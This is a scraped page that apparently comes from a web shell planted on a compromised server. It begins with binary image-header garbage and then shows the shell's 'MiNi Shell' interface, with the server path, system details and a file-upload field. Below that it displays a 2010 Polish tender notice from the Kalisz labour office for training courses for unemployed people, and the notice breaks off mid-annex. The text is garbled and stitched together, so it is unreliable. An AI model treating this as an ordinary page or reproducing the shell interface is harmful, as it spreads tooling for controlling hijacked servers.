JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100527/137503-N-2010.html

<p class="kh_header"><b>Kalisz: Przetarg nieograniczony na usługi szkoleniowe (wspólny słownik zamówień publicznych CPV : 80411200-0, 80500000-9, 80530000-8</b><br>
<b>Numer ogłoszenia: 137503 - 2010; data zamieszczenia: 27.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Kaliszu , ul. Stanisława Staszica 47A, 62-800 Kalisz, woj. wielkopolskie, tel. 062 7689700, faks 062 7689790.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na usługi szkoleniowe (wspólny słownik zamówień publicznych CPV : 80411200-0, 80500000-9, 80530000-8.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkoleń dla osób bezrobotnych wg podziału na nastepujące części zamówienia:
1.1 kurs przedsiębiorczości dla 10 osób bezrobotnych,
1.2 kurs sekretarki, asystentki szefa z podstawami języka angielskiego dla 10 osób bezrobotnych,
1.3 kurs prawa jazdy kat. C dla 10 osób bezrobotnych,
1.4 kurs operatora koparko -ładowarki kl.III dla  10 osób bezrobotnych,
1.5 kurs przedsiębiorczości dla 10 osób bezrobotnych,
1.6. kurs brukarza dla 10 osób bezrobotnych,
1.7 kurs obsługi komputera i kasy fiskalnej dla 20 osób bezrobotnych,
1.8 kurs stylistki paznokci, kosmetyczki z elementami rozpoczęcia działalności gospodarczej dla10 osób bezrobotnych ,
1.9 kurs technologa robót wykończeniowych z elementami prowadzenia działalności gospodarczej dla 10 osób bezrobotnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełnienia warunków udziału w postępowaniu wymaga złożenia oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych stanowiące załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający na potwierdzenie spełnienia warunków udziału w postępowaniu wymaga złożenia oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych stanowiące załącznik nr 4 do SIWZ. 
2. Jeżeli Wykonawca wykazując spełnienie warunków o których mowa w art. 22 ust.1 ustawy Prawo zamówień publicznych, polega na wiedzy i doświadczeniu innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, przedkłada pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
3. Jeżeli Wykonawca, wykazując spełnienie warunków, których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, polega na wiedzy i doświadczeniu innych podmiotów, a podmioty te będą brały udział w realizacji zamówienia Wykonawca zobowiązany jest ponadto przedstawić:
3.1 oświadczenia tych podmiotów o braku podstaw do wykluczenia z powodu okoliczności, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych, stanowiące załącznik nr 3 do SIWZ,
3.2 zaświadczenie właściwego Naczelnika Urzędu skarbowego potwierdzającego, że podmiot ten nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
3.3 zaświadczenie właściwego oddziału ZUS lub KRUS potwierdzającego, że podmiot ten nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający na potwierdzenie spełnienia warunków udziału w postępowaniu wymaga złożenia oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych stanowiące załącznik nr 4 do SIWZ.
2. Jeżeli Wykonawca wykazując spełnienie warunków o których mowa w art. 22 ust.1 ustawy Prawo zamówień publicznych, polega na potencjale technicznym innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, przedkłada pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
3. Jeżeli Wykonawca, wykazując spełnienie warunków, których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, polega na potencjale technicznym innych podmiotów, a podmioty te będą brały udział w realizacji zamówienia Wykonawca zobowiązany jest ponadto przedstawić:
3.1 oświadczenia tych podmiotów o braku podstaw do wykluczenia z powodu okoliczności, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych, stanowiące załącznik nr 3 do SIWZ,
3.2 zaświadczenie właściwego Naczelnika Urzędu skarbowego potwierdzającego, że podmiot ten nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
3.3 zaświadczenie właściwego oddziału ZUS lub KRUS potwierdzającego, że podmiot ten nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający na potwierdzenie spełnienia warunków udziału w postępowaniu wymaga złożenia oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych stanowiące załącznik nr 4 do SIWZ.
2. Jeżeli Wykonawca wykazując spełnienie warunków o których mowa w art. 22 ust.1 ustawy Prawo zamówień publicznych, polega na osobach zdolnych do wykonania zamówienia innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, przedkłada pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
3. Jeżeli Wykonawca, wykazując spełnienie warunków, których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, polega na osobach zdolnych do wykonania zamówienia innych podmiotów, a podmioty te będą brały udział w realizacji zamówienia Wykonawca zobowiązany jest ponadto przedstawić:
3.1 oświadczenia tych podmiotów o braku podstaw do wykluczenia z powodu okoliczności, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych, stanowiące załącznik nr 3 do SIWZ,
3.2 zaświadczenie właściwego Naczelnika Urzędu skarbowego potwierdzającego, że podmiot ten nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
3.3 zaświadczenie właściwego oddziału ZUS lub KRUS potwierdzającego, że podmiot ten nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający na potwierdzenie spełnienia warunków udziału w postępowaniu wymaga złożenia oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych stanowiące załącznik nr 4 do SIWZ.
2. Jeżeli Wykonawca wykazując spełnienie warunków o których mowa w art. 22 ust.1 ustawy Prawo zamówień publicznych, polega na zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, przedkłada pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
3. Jeżeli Wykonawca, wykazując spełnienie warunków, których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, polega na zdolnościach finansowych innych podmiotów, a podmioty te będą brały udział w realizacji zamówienia Wykonawca zobowiązany jest ponadto przedstawić:
3.1 oświadczenia tych podmiotów o braku podstaw do wykluczenia z powodu okoliczności, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych, stanowiące załącznik nr 3 do SIWZ,
3.2 zaświadczenie właściwego Naczelnika Urzędu skarbowego potwierdzającego, że podmiot ten nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
3.3 zaświadczenie właściwego oddziału ZUS lub KRUS potwierdzającego, że podmiot ten nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
3.4 informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w której podmiot ten posiada rachunek potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca zobowiązany jest złożyć wraz z ofertą: 
1.1 oświadczenie dot. ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb szkolenia, wg wzoru stanowiącego załącznik nr 8 do SIWZ,
1.2 program szkolenia według wzoru stanowiącego załącznik nr 7 do SIWZ, 
1.3 wzór zaświadczenia o ukończonym szkoleniu, wydanego na podstawie rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach poza szkolnych (Dz. U. nr 31, poz. 216) i)lub innych dokumentów świadczących o nabytych umiejętnościach czy uprawnieniach. 
1.4 certyfikat  jakości i akredytację Kuratora bądź oświadczenie o braku tych dokumentów,
2. Dokumenty wymienione w punkcie 1 podpunktach  1.1 i 1.2  muszą być złożone w formie oryginału, natomiast dokumenty wymienione w punkcie 1 podpunktach 1.3 - 1.4 mogą być złożone w formie oryginału lub kserokopii potwierdzonej za zgodność przez Wykonawcę lub osobę(y) uprawnioną(e) do reprezentowania z dopiskiem za zgodność z oryginałem</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta Wykonawcy musi zawierać również:
1. wypełniony i podpisany formularz ofertowy, stanowiący załącznik nr 6 do SIWZ,
2. parafowany na każdej stronie projekt umowy wraz z załącznikami, stanowiący załącznik nr 2 do SIWZ,
3. oświadczenie dotyczące udziału podwykonawców w wykonaniu zamówienia, wg wzoru stanowiącego załącznik nr 10 do SIWZ,
4. oświadczenie dot. zaangażowania w pozyskiwanie miejsc pracy dla przeszkolonych osób oraz dot. nadzoru wewnętrznego, wg wzoru stanowiącego załącznik nr 9 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Zakres i jakość oferowanych programów szkoleń w tym wykorzystywanie standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych - 30</li>
<li>3 - kwalifikacje kadry dydaktycznej - 10</li>
<li>4 - dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb szkolenia z uwzględnieniem bhp - 5</li>
<li>5 - nadzór wewnetrzny służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6 - posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 5</li>
<li>7 - zaangażowanie instytucji szkoleniowej w pozyskiwanie miesjc pracy dla przeszkolonych osób - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy, za wyjątkiem okoliczności oraz warunków zmian określonych poniżej:
1 zmniejszenia liczby uczestników szkolenia z przyczyn niezależnych od Zamawiającego, będącego wynikiem nie podjęcia kursu lub rezygnacji kandydata pomimo wcześniejszych deklaracji o uczestnictwie, 
2 wystąpienia nieprzewidzianych zdarzeń losowych (np. choroba, śmierć, rozwiązanie stosunku pracy), wymagających zmiany kadry. Zmiana ta może nastąpić pod warunkiem, że Wykonawca zapewni osobę, której doświadczenie zawodowe i wykształcenie będzie minimum takie samo jak osoby wskazanej w wykazie kadry zaangażowanej w realizacje szkolenia.
Zmiana umowy w zakresie określonym w punkcie 2 może nastąpić  na umotywowany wniosek Wykonawcy. 
Zmiany umowy wymagają formy pisemnej w postaci aneksu,  pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.kalisz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Kaliszu, ul. Staszica 47a, 62-800 Kalisz, pok. nr 123 I piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2010 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Kaliszu, ul. Staszica 47a, 62-800 Kalisz, pok. nr 123 I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 06.07.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KURS  PRZEDSIĘBIORCZOŚCI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KURS  dla 10 osób bezrobotnych, składający się z jednego 
       bloku: 
BLOKU ZAWODOWEGO
Program szkolenia musi zawierać między innymi następujące zagadnienia:
- sporządzanie biznes planu,
- rejestracja firmy,
- zarządzanie finansami w małej firmie,
- formy opodatkowania,
- rozliczenia z Urzędem Skarbowym i ZUS-em,
- obsługa programu Płatnik.
Wymagana ilość godzin:
- teoretycznych - 20
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych - 40
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Wymagane jest jedno stanowisko komputerowe dla jednej osoby.
Czas trwania szkolenia: maksymalnie 2 tygodnie przypadające w okresie czerwiec - pierwsza połowa lipca 2010r. 
Zamawiający wymaga aby szkolenie realizowane było według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008r. nr 69. 415 z późn. zm.). Realizując ten zapis Wykonawca powinien szkolenie przeprowadzić maksymalnie w czasie 2 tygodni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.85.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. zakres i jakośc oferowanych programów szkoleń w tym wykorzystywanie standardów kwalif.zawod.i modułowych prog.szkoleń zaw.oraz sposób spr. efektów szk - 30</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
